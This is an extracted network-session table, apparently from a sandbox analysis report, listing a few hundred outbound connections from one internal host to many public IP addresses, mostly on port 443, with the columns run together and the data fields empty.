                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18584192.168.2.233931859.225.111.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18585192.168.2.2353468206.51.48.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18586192.168.2.235360227.162.173.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18587192.168.2.2339814155.179.27.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18588192.168.2.234180275.72.137.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18589192.168.2.234278220.158.194.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18590192.168.2.234764295.136.89.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18591192.168.2.2359168118.71.208.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18592192.168.2.2342586135.21.221.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18593192.168.2.2340998194.53.75.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18594192.168.2.233410849.54.46.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18595192.168.2.234852493.122.150.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18596192.168.2.2355630162.166.64.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18597192.168.2.2350512161.40.221.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18598192.168.2.2342372208.116.173.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18599192.168.2.2333214144.138.93.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18600192.168.2.2355804136.191.79.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18601192.168.2.2350634120.148.226.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18602192.168.2.2351110222.44.135.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18603192.168.2.234107086.78.17.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18604192.168.2.2346924193.174.228.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18605192.168.2.233691060.147.50.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18606192.168.2.235890678.31.10.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18607192.168.2.235095018.1.242.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18608192.168.2.2354104155.86.194.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18609192.168.2.2336396201.104.65.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18610192.168.2.234111225.217.252.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18611192.168.2.2332924117.186.221.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18612192.168.2.2349662216.208.0.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18613192.168.2.234964658.240.81.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18614192.168.2.2360296174.26.176.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18615192.168.2.2349056129.197.110.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18616192.168.2.2353106118.46.81.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18617192.168.2.2342222201.199.11.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18618192.168.2.234713263.184.206.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18619192.168.2.234547625.43.114.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18620192.168.2.23543645.176.228.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18621192.168.2.234747066.109.218.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18622192.168.2.235209889.86.193.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18623192.168.2.2345138103.88.34.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18624192.168.2.2360998223.93.160.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18625192.168.2.235894695.54.18.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18626192.168.2.2343818212.129.161.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18627192.168.2.234965696.50.52.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18628192.168.2.2354582153.2.205.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18629192.168.2.235449444.172.98.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18630192.168.2.234591649.87.121.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18631192.168.2.2341964166.53.139.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18632192.168.2.234903445.50.95.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18633192.168.2.2357428189.228.205.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18634192.168.2.2358900222.102.119.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18635192.168.2.236058689.158.88.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18636192.168.2.2344632150.103.153.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18637192.168.2.234827024.147.173.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18638192.168.2.2346974132.39.237.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18639192.168.2.2358518137.121.251.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18640192.168.2.234345258.6.90.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18641192.168.2.233849486.212.88.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18642192.168.2.2335082223.210.117.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18643192.168.2.2359084134.136.184.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18644192.168.2.2359516165.66.60.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18645192.168.2.236048866.158.220.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18646192.168.2.2340804158.199.148.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18647192.168.2.233618840.118.90.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18648192.168.2.2338206179.94.204.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18649192.168.2.235833848.192.174.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18650192.168.2.2353272153.249.179.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18651192.168.2.235044447.195.147.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18652192.168.2.2355726135.157.83.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18653192.168.2.2340912186.145.211.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18654192.168.2.233688091.2.113.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18655192.168.2.2355372212.151.197.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18656192.168.2.2347840135.186.48.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18657192.168.2.2350466121.77.131.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18658192.168.2.235167413.175.69.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18659192.168.2.2354670213.104.180.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18660192.168.2.2338102186.27.163.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18661192.168.2.2358554114.189.39.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18662192.168.2.234615475.155.210.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18663192.168.2.235562238.205.34.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18664192.168.2.235139458.80.19.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18665192.168.2.234012867.196.159.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18666192.168.2.234030689.39.130.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18667192.168.2.234831427.176.252.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18668192.168.2.233927219.126.10.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18669192.168.2.2335312207.97.184.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18670192.168.2.2350524143.172.201.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18671192.168.2.2340826198.213.190.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18672192.168.2.2334334116.206.38.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18673192.168.2.2336016187.206.60.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18674192.168.2.2350828143.42.145.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18675192.168.2.235117413.252.35.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18676192.168.2.235773494.104.58.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18677192.168.2.234006277.112.194.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18678192.168.2.235844885.180.66.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18679192.168.2.2346388216.244.42.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18680192.168.2.234948439.49.39.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18681192.168.2.2345752164.63.9.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18682192.168.2.235527034.181.199.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18683192.168.2.233989868.221.231.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18684192.168.2.234581073.117.70.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18685192.168.2.2333576205.156.219.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18686192.168.2.2345814124.167.133.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18687192.168.2.235273093.84.225.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18688192.168.2.2356278130.117.120.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18689192.168.2.2355294220.187.100.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18690192.168.2.2345586101.153.96.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18691192.168.2.2351362130.158.88.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18692192.168.2.2360690131.0.212.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18693192.168.2.2334490193.170.7.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18694192.168.2.235110853.63.120.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18695192.168.2.2351202205.201.159.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18696192.168.2.2356370198.162.46.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18697192.168.2.2354224177.125.6.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18698192.168.2.2358700139.229.129.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18699192.168.2.235520817.83.73.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18700192.168.2.2354266222.9.198.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18701192.168.2.234342852.87.147.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18702192.168.2.233857423.200.28.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18703192.168.2.2341324191.124.79.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18704192.168.2.2360742205.19.16.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18705192.168.2.234330847.102.67.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18706192.168.2.233561065.35.47.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18707192.168.2.2347192114.64.90.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18708192.168.2.235205250.176.105.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18709192.168.2.23582084.54.16.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18710192.168.2.2357526164.60.56.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18711192.168.2.234929084.45.201.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18712192.168.2.234600889.201.47.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18713192.168.2.233358232.213.68.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18714192.168.2.2343492156.145.212.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18715192.168.2.23500542.89.122.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18716192.168.2.235803278.3.40.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18717192.168.2.2354968196.80.229.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18718192.168.2.2334680190.237.187.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18719192.168.2.2354752154.22.54.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18720192.168.2.234115217.52.199.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18721192.168.2.2344248204.122.242.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18722192.168.2.2336348130.29.73.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18723192.168.2.2338976171.74.47.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18724192.168.2.235226472.232.244.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18725192.168.2.236014267.230.19.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18726192.168.2.233301819.65.58.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18727192.168.2.2360084209.25.48.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18728192.168.2.2356078212.237.134.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18729192.168.2.2346302141.190.53.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18730192.168.2.2356670140.73.154.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18731192.168.2.2335990133.211.143.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18732192.168.2.2345540145.111.249.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18733192.168.2.2351400168.0.128.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18734192.168.2.2341386164.172.83.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18735192.168.2.2354184168.31.24.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18736192.168.2.2353928151.232.252.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18737192.168.2.234749676.216.243.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18738192.168.2.2343258149.10.10.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18739192.168.2.2350494107.43.21.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18740192.168.2.2334558184.209.239.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18741192.168.2.2343528129.216.0.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18742192.168.2.2343812114.126.196.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18743192.168.2.2335408138.138.226.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18744192.168.2.23478324.73.55.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18745192.168.2.235710237.27.151.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18746192.168.2.234575843.26.9.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18747192.168.2.23544641.41.172.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18748192.168.2.235551460.214.123.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18749192.168.2.235481296.50.206.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18750192.168.2.23401321.239.174.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18751192.168.2.2360816122.252.25.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18752192.168.2.235332464.210.16.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18753192.168.2.2345434182.0.24.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18754192.168.2.2332914131.18.59.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18755192.168.2.234359631.120.226.68080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18756192.168.2.2344348161.97.185.1038080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18757192.168.2.23521742.85.86.1518080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18758192.168.2.2340000104.25.126.628080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18759192.168.2.2350900181.224.178.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18760192.168.2.2339238119.89.164.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18761192.168.2.2359456157.188.20.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18762192.168.2.235589238.35.139.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18763192.168.2.2342024106.207.39.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18764192.168.2.2350532102.173.15.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18765192.168.2.2357082144.248.252.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18766192.168.2.2357444153.145.148.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18767192.168.2.2348172133.209.84.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18768192.168.2.233997235.88.85.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18769192.168.2.2340690189.22.244.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18770192.168.2.2345188220.145.149.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18771192.168.2.2337548183.6.3.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18772192.168.2.2341252123.123.168.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18773192.168.2.2360342206.114.20.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18774192.168.2.235288224.161.46.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18775192.168.2.233536866.87.54.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18776192.168.2.2340104165.38.109.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18777192.168.2.235831654.184.114.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18778192.168.2.2342514171.115.7.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18779192.168.2.2356114118.197.252.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18780192.168.2.2337044167.25.204.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18781192.168.2.2346616140.29.172.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18782192.168.2.2340490191.124.47.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18783192.168.2.2359584173.234.219.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18784192.168.2.2352446135.16.189.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18785192.168.2.2335532218.27.112.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18786192.168.2.234879862.180.153.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18787192.168.2.23474509.238.222.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18788192.168.2.234021262.36.220.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18789192.168.2.235088449.54.205.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18790192.168.2.2354058181.254.33.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18791192.168.2.2349532122.51.251.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18792192.168.2.235992634.173.126.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18793192.168.2.2349720139.164.170.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18794192.168.2.2355810185.110.4.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18795192.168.2.2337728155.58.1.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18796192.168.2.2346274197.160.95.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18797192.168.2.2348088205.140.242.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18798192.168.2.234944049.111.165.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18799192.168.2.2351936171.234.191.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18800192.168.2.233803841.161.192.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18801192.168.2.233864861.188.226.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18802192.168.2.2346918113.70.126.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18803192.168.2.2335358140.99.1.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18804192.168.2.235906494.190.154.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18805192.168.2.235536027.37.86.86443
